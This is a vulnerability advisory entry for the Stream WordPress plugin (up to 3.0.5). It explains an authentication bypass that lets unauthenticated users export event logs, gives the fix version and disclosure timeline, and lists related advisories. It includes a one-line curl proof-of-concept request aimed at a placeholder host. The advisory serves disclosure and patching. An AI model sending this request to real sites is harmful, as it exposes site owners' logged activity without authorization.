Stream <= 3.0.5 – Unauthenticated Events Export | Plugin Vulnerabilities

Description

The Stream WordPress plugin allows unauthenticated users to export CSV or JSON of recent events. The code only checks to see if the proper GET variables are passed to a valid backend WordPress handler and will happily export logged entries.

Reported to maintainers on 5/25/2016 and new version released 5/30/2016

Proof of Concept

curl -i -X POST    -H "Content-Type:application/x-www-form-urlencoded"    -d "action=nonexistingaction"  'http://example.com/wordpress/wp-admin/admin-ajax.php?page=wp_stream&record-actions=export-json'

Affects Plugins

Fixed in 3.0.6

References

Classification

Type

AUTHBYPASS

OWASP top 10

A2: Broken Authentication and Session Management

CWE

Miscellaneous

Submitter

James Golovich

Submitter website

http://pritect.net

Submitter twitter

Verified

No

WPVDB ID

8fa150be-75c2-48b3-8d3b-bc623f25debd

Timeline

Publicly Published

2016-05-31 (about 9 years ago)

Added

2016-05-31 (about 9 years ago)

Last Updated

2019-11-01 (about 6 years ago)

Other

Published

Title

Published

2025-06-02

Title

Golo < 1.7.1 - Authentication Bypass to Account Takeover

Published

2018-05-16

Title

Charitable <= 1.5.13 - Unauthorised Access

Published

2025-02-08

Title

WP Directorybox Manager <= 2.5 - Authentication Bypass

Published

2019-09-26

Title

GiveWp < 2.5.5 - Authentication Bypass

Published

2023-05-18

Title

BP Social Connect < 1.6.2 - Authentication Bypass